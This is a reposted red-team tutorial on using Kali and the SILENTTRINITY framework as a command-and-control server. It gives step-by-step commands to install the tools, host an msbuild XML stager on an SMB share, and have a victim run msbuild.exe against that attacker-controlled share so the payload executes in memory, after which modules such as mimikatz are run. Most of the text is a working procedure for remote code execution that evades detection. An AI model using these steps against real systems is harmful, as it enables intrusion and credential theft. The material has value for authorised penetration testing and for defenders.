未加星标

The Rise of C# and using Kali as a C2 Server with SILENTTRINITY

字体大小 | |
[系统(linux) 所属分类 系统(linux) | 发布者 店小二04 | 时间 2018 | 作者 红领巾 ] 0人收藏点击收藏

There’s been a disturbance in the red team field, have you felt it? It’s C#. More mature environments have finally caught on that Powershell can be used for malicious gains and pentesters could own your domain with a few Powershell commands, so admins have began to lock it down, EDRs have began to alert, and thus the saying goes, necessity is the mother of invention.

So why C#? Simply put, it has access to the .NET framework like Powershell does. The other big reason is that Microsoft has unsigned executables that will compile and execute C# code that is installed by default with windows 10. Matt Graber found one of the executables and did an excellent write-up of it here. The TL;DR of it is thatMicrosoft.Workflow.Compiler.exe, which is installed as part of the .NET framework, will run C# code that is in a XOML file. There’s been a huge movement to use LOL (living off the land) tactics, meaning use what you have at your disposal instead of downloading things to victim machines, so this discovery was huge. Of course, people immediately started to look at how to weaponize this for another binary that will compiled and run code via XML ― msbuild.exe. byt3bl33d3r , who wrote crackmapexec, Empire, and Deathstar, developed a tool called SILENTTRINITY , which utilizes Ironpython to utilizes Python to execute C#. This is how it works:

Using Kali, install Python3

apt-get install python3.7 apt-get install python3.7-dev

Then download SILENTTRINITY

git clone https://github.com/byt3bl33d3r/SILENTTRINITY

Then install the requirements.

cd SILENTTRINITY python3.7 -m pip install -r requirements.txt

Then start SILENTTRINITY

cd Server python3.7 st.py

Before starting SILENTTRINITY we’ll spin up a Samba server so that we don’t have to drop files to disk on the target and instead fetch the payload via SMB path. To do this, impacket has a set of tools in their github repository here, one of which is smbserver.py which will spin up a quick SMB server.

First download & install the impacket repository

git clone https://github.com/SecureAuthCorp/impacket.git cd impacket pip install -r requirements.txt python setup.py install

Then create a folder that will be shared

mkdir /root/SMB

Then run smbserver.py. Since it was ‘installed’ it can be ran anywhere via

smbserver.py SMB /root/SMB
The Rise of C# and using Kali as a C2 Server with SILENTTRINITY

Then start SILENTTRINITY

cd SILENTTRINITY/Server/ python3.7 st.py

You should then be seeing this


The Rise of C# and using Kali as a C2 Server with SILENTTRINITY

Next is to spin up an HTTP listener, as shown below.


The Rise of C# and using Kali as a C2 Server with SILENTTRINITY

Once that is spun up, next is to generate the actual stager, which is what will be executed. In this case, we’re using msbuild.


The Rise of C# and using Kali as a C2 Server with SILENTTRINITY

The XML file is generated in the same directory as st.py, so copy that to the Samba share that was made which in this case is at /root/SMB.

cp msbuild.xml /root/SMB
The Rise of C# and using Kali as a C2 Server with SILENTTRINITY

Finally, run the trick now is to get the victim to execute the xml file via SMB path.

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe \\192.168.43.248\SMB\msbuild.xml
The Rise of C# and using Kali as a C2 Server with SILENTTRINITY

You’ll see a command prompt open up and if you look back at SILENTTRINITY, you’ll have a session.


The Rise of C# and using Kali as a C2 Server with SILENTTRINITY

And to list the sessions:


The Rise of C# and using Kali as a C2 Server with SILENTTRINITY

Now you can use modules against that session, like in Empire


The Rise of C# and using Kali as a C2 Server with SILENTTRINITY

e.g. mimikatz


The Rise of C# and using Kali as a C2 Server with SILENTTRINITY

The purpose of this is to show that you never have to drop files to disk and can actually execute code remotely, in memory, by using SMB and binaries that exist on most current Windows deployments. The interesting thing is that this isn’t a bug with msbuild.exe or or workflow.complier.exe, those binaries are meant to do this, we’re just exploiting it for offensive purposes.

本文系统(linux)相关术语:linux系统 鸟哥的linux私房菜 linux命令大全 linux操作系统

tags: SMB,SILENTTRINITY,install,py
分页:12
转载请注明
本文标题:The Rise of C# and using Kali as a C2 Server with SILENTTRINITY
本站链接:https://www.codesec.net/view/604898.html


1.凡CodeSecTeam转载的文章,均出自其它媒体或其他官网介绍,目的在于传递更多的信息,并不代表本站赞同其观点和其真实性负责;
2.转载的文章仅代表原创作者观点,与本站无关。其原创性以及文中陈述文字和内容未经本站证实,本站对该文以及其中全部或者部分内容、文字的真实性、完整性、及时性,不作出任何保证或承若;
3.如本站转载稿涉及版权等问题,请作者及时联系本站,我们会及时处理。
登录后可拥有收藏文章、关注作者等权限...
技术大类 技术大类 | 系统(linux) | 评论(0) | 阅读(8)